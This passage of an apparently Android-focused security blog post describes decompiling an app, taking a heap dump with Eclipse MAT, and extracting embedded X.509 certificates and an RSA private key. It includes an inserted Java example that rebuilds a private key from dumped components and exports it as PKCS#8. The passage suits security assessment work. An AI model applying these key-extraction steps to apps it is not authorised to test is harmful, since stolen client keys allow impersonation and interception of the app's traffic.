<a href="http://android-developers.blogspot.com/2011/03/memory-analysis-for-android.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">android-developers.blogspot.com</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<a href="http://eclipsesource.com/blogs/2013/01/21/10-tips-for-using-the-eclipse-memory-analyzer/" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">eclipsesource.com</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></a></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Okay, now back to our target application. </span></div>
<h3 style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Locating the crypto material</span></span></h3>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">As part of the reversing process I used </span><a href="https://code.google.com/p/dex2jar/" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">dex2jar</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> to decompile the application </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">apk</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> to Java files and started analyzing them. While following the application logic and reviewing its obfuscated code, I stumbled upon a Java file (</span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">com.pack.age.name.h.b.java</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">) that contained instance variables of type </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SSLSocketFactory</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> and </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">X509TrustManager</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. Clearly, this class was performing important cryptographic operations with respect to client-server communication. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">So I pivoted to this class to identify the source of its crypto material, and all attempts led me from one rabbit hole to another. I then decided to look directly at the application heap with Eclipse MAT. I launched the application and performed some operations to ensure that it had loaded the required crypto material, and then performed the following steps to create the HPROF file containing the application heap dump.</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Select the application from the list of running apps</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Select the “Show heap updates” option for the target application</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Select “Dump HPROF file” for analysis. </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Since I had the MAT plugin installed, ADT converted the Android memory dump to HPROF format and presented it for analysis. In case you do not have the MAT plugin, you will need to convert the generated dump to a MAT-readable format with the </span><a href="http://developer.android.com/tools/help/hprof-conv.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">hprof-conv</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> utility that comes with ADT.</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">After opening the heap dump, I clicked on the “Dominator Tree” to view the object graph. Supplying the name of the class which had </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SSLSocketFactory</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> and </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">X509TrustManager</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> instance variables in the Regex area filtered out most of the unwanted stuff. I then navigated the object tree to identify the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">X.509</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> certificates and the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivateCrtKey</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, as shown below.</span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxhzLhmVAQ-6TY5VJ0h7POMJsqjzjavbpQfVXQvHOIH1xwbudZRHGKOQ-BuXE2UsjTBtb0ihoXC3Rp4xDqLU_LltdybY5jeZJQ4wkqedqCoQK434ZdwSqweH4u2QYi1xuRPbJx71cR-t8k/s1600/keys-certs-memory.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxhzLhmVAQ-6TY5VJ0h7POMJsqjzjavbpQfVXQvHOIH1xwbudZRHGKOQ-BuXE2UsjTBtb0ihoXC3Rp4xDqLU_LltdybY5jeZJQ4wkqedqCoQK434ZdwSqweH4u2QYi1xuRPbJx71cR-t8k/s400/keys-certs-memory.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #4f81bd; font-family: Calibri; font-size: 12px; font-weight: bold; line-height: 12px; text-align: left; white-space: pre-wrap;"> Image shows two X.509 certificates and an RSAPrivateCrtKey in the program heap</span></td></tr>
</tbody></table>
<div dir="ltr" style="line-height: 1; margin-bottom: 10pt; margin-top: 0pt;">
<br /></div>
<h3 style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Dumping the certificates</span></span></h3>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The X.509 certificates were byte arrays of different lengths and extracting the certificates turned out to be quick. I right-clicked on the byte array, navigated to Copy &gt; Save Value to File, selected a location to save the file and clicked Finish. MAT indicates that the copy functionality allows you to write </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">char[]</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">String</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">StringBuffer</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> and </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">StringBuilder</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> to a text file, but it handsomely handled the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">byte[]</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> in the current context. Please note that the extension of the exported file was set to </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">.der </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">on the Windows system. The following screenshots show the steps followed and one extracted certificate. </span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5sTKd2n7bgnNcD83bmJBr4KdoV-yRp0X9P160OHljUFJx5uCBdeXUXCvdyrTgTwqYs46zXBsIG81NF0pFr1XkFbwG4wCiWXVAcsodpCuHpKBi06C08eBmo0CdO9TjoN64PT9CSazOLG8g/s1600/exporting-a-certificate.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5sTKd2n7bgnNcD83bmJBr4KdoV-yRp0X9P160OHljUFJx5uCBdeXUXCvdyrTgTwqYs46zXBsIG81NF0pFr1XkFbwG4wCiWXVAcsodpCuHpKBi06C08eBmo0CdO9TjoN64PT9CSazOLG8g/s320/exporting-a-certificate.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #4f81bd; font-family: Calibri; font-size: 12px; font-weight: bold; line-height: 12px; text-align: left; white-space: pre-wrap;">Image shows selecting the “Save Value to File” functionality for the byte[]</span></td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSVIsqvgHN5VwnKhfglA_GFIxjkjXO5SYGOTHhOhDKGpOXHUIgCEzPfFqBEuXStquR6BchG-z1teGS3Unb3fj_n6kDxxErqHZsd3QMy63Us0FlmQP_1S1ovtAlKvTYqKgqWLmTxk4lZY_0/s1600/save-certificate-der.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="281" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSVIsqvgHN5VwnKhfglA_GFIxjkjXO5SYGOTHhOhDKGpOXHUIgCEzPfFqBEuXStquR6BchG-z1teGS3Unb3fj_n6kDxxErqHZsd3QMy63Us0FlmQP_1S1ovtAlKvTYqKgqWLmTxk4lZY_0/s400/save-certificate-der.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #4f81bd; font-family: Calibri; font-size: 12px; font-weight: bold; line-height: 12px; text-align: left; white-space: pre-wrap;">Image shows file saved as certificate-1.der </span></td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfo7bsdIlkJyrQnDkF3bFhg6TMvk1J5sL9lP_Yt_k9LUciHXFoiKfF42DeiVrxijIJQBZFtOUNCkqZScrXYkMW3ZkPkgMb_u_ev0biUC_eOV7nISQnA62NyguO9QfFLKqEz07UKbKCB5RD/s1600/cert-web-cd.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfo7bsdIlkJyrQnDkF3bFhg6TMvk1J5sL9lP_Yt_k9LUciHXFoiKfF42DeiVrxijIJQBZFtOUNCkqZScrXYkMW3ZkPkgMb_u_ev0biUC_eOV7nISQnA62NyguO9QfFLKqEz07UKbKCB5RD/s320/cert-web-cd.png" width="259" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #4f81bd; font-family: Calibri; font-size: 12px; font-weight: bold; line-height: 12px; text-align: left; white-space: pre-wrap;"> Image shows the extracted Root CA certificate from the Android application</span></td></tr>
</tbody></table>
<br />
<h3 style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Extracting the RSAPrivateCrtKey</span></span></h3>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The second important component was the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivateCrtKey</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, and extracting it was a little more involved, as we will see below. To summarize, the following steps were followed to retrieve the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivateCrtKey</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">:</span></div>
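The reconstruction that the steps below summarize, written out as an added Java example (this is not the post's own code). It assumes the eight CRT components were saved from MAT as raw big-endian magnitude bytes with no sign byte; since no heap dump is available here, the components are constructed from a freshly generated key and then treated exactly like dumped values.

```java
import java.math.BigInteger;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.security.KeyFactory;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.PrivateKey;
import java.security.Signature;
import java.security.interfaces.RSAPrivateCrtKey;
import java.security.interfaces.RSAPublicKey;
import java.security.spec.RSAPrivateCrtKeySpec;
import java.util.Arrays;

public class RebuildRsaCrtKey {

    // Stand-in for a component saved with MAT's "Save Value to File"
    // (assumption: the saved bytes are the raw big-endian magnitude).
    // BigInteger.toByteArray() prepends 0x00 when the top bit is set, so
    // that byte is stripped here to mimic a raw dump.
    static byte[] rawMagnitude(BigInteger v) {
        byte[] b = v.toByteArray();
        return (b.length > 1 && b[0] == 0) ? Arrays.copyOfRange(b, 1, b.length) : b;
    }

    // The eight components in the order RSAPrivateCrtKeySpec expects:
    // n, e, d, p, q, dP, dQ, qInv. Constructed input for this example only.
    static byte[][] dumpComponents(RSAPrivateCrtKey k) {
        return new byte[][] {
            rawMagnitude(k.getModulus()),         rawMagnitude(k.getPublicExponent()),
            rawMagnitude(k.getPrivateExponent()), rawMagnitude(k.getPrimeP()),
            rawMagnitude(k.getPrimeQ()),          rawMagnitude(k.getPrimeExponentP()),
            rawMagnitude(k.getPrimeExponentQ()),  rawMagnitude(k.getCrtCoefficient()),
        };
    }

    // Step 3. new BigInteger(byte[]) reads two's complement, so a modulus whose
    // first byte is >= 0x80 comes back negative and the KeyFactory rejects it.
    // The (signum, magnitude) constructor forces the positive interpretation.
    static BigInteger positive(byte[] magnitude) {
        return new BigInteger(1, magnitude);
    }

    // Steps 4 and 5: build the spec, then let the RSA KeyFactory produce the key.
    static RSAPrivateCrtKey rebuild(byte[][] c) throws Exception {
        RSAPrivateCrtKeySpec spec = new RSAPrivateCrtKeySpec(
                positive(c[0]), positive(c[1]), positive(c[2]), positive(c[3]),
                positive(c[4]), positive(c[5]), positive(c[6]), positive(c[7]));
        return (RSAPrivateCrtKey) KeyFactory.getInstance("RSA").generatePrivate(spec);
    }

    // Step 6: for an RSA private key, getEncoded() yields PKCS#8 DER.
    static void writePkcs8(PrivateKey key, String path) throws Exception {
        if (!"PKCS#8".equals(key.getFormat())) {
            throw new IllegalStateException("unexpected encoding " + key.getFormat());
        }
        Files.write(Paths.get(path), key.getEncoded());
    }

    // Sanity checks before trusting a recovered key: p*q must equal n, and a
    // signature made with it must verify under the public key the app uses.
    static boolean consistentWith(RSAPrivateCrtKey priv, RSAPublicKey pub) throws Exception {
        if (!priv.getPrimeP().multiply(priv.getPrimeQ()).equals(priv.getModulus())) return false;
        if (!priv.getModulus().equals(pub.getModulus())) return false;
        byte[] msg = "heap-dump-consistency-check".getBytes(StandardCharsets.UTF_8);
        Signature s = Signature.getInstance("SHA256withRSA");
        s.initSign(priv);
        s.update(msg);
        byte[] sig = s.sign();
        s.initVerify(pub);
        s.update(msg);
        return s.verify(sig);
    }

    public static void main(String[] args) throws Exception {
        KeyPairGenerator gen = KeyPairGenerator.getInstance("RSA");
        gen.initialize(2048);
        KeyPair kp = gen.generateKeyPair();

        byte[][] dumped = dumpComponents((RSAPrivateCrtKey) kp.getPrivate());
        // The step 3 pitfall made visible: the raw modulus bytes read as negative.
        System.out.println("signed read of n is negative: "
                + (new BigInteger(dumped[0]).signum() < 0));

        RSAPrivateCrtKey rebuilt = rebuild(dumped);
        System.out.println("rebuilt key consistent with public key: "
                + consistentWith(rebuilt, (RSAPublicKey) kp.getPublic()));
        writePkcs8(rebuilt, "recovered-key.pk8");
    }
}
```

The consistency check is the part worth keeping when working from a real dump: if `p*q != n` or the signature does not verify against the certificate's public key, one of the saved components was mis-identified or truncated.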
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Locate the components that make up the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivateCrtKeySpec</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Copy all the components and store them in the file system</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Compute positive </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BigInteger</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> values from these components</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Construct an </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivateCrtKeySpec</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> from its components</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Use the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivateCrtKeySpec</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> object to construct the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivateCrtKey</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Write the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivateCrtKey</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> to the file system in </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">PKCS8</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> (DER) format</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">And optionally:</span></div>
</li>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: lower-alpha; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Convert </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">PKCS8</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> to </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">PEM</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; 